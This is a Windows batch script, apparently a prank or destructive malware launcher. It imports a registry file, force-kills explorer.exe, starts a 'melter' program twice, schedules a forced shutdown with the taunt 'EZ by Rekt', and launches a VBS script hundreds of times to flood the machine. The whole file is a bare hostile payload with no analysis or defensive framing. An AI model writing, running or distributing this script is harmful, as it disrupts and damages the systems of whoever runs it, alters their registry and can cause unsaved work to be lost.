@echo off
reg import mp3.reg
start parle.vbs
timeout /T 20 /NOBREAK
taskkill /f /im explorer.exe
start musicstart.vbs
start melter.exe
start ZIZI.vbs
shutdown -s -t 300 "MMMMMM... EZ by Rekt"
start ZIZI.vbs
start ZIZI.vbs
start melter.exe
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs